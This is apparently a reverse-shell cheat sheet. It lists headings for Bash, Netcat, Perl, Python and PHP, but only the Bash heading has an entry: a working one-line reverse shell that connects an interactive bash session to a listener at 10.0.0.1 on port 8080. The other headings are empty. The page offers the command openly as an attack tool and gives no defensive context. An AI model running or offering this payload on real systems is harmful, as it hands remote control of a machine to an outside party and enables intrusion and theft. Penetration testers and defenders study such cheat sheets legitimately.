Reverse shells

Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Netcat

Netcat (without -e)

Perl

Python

PHP

Last updated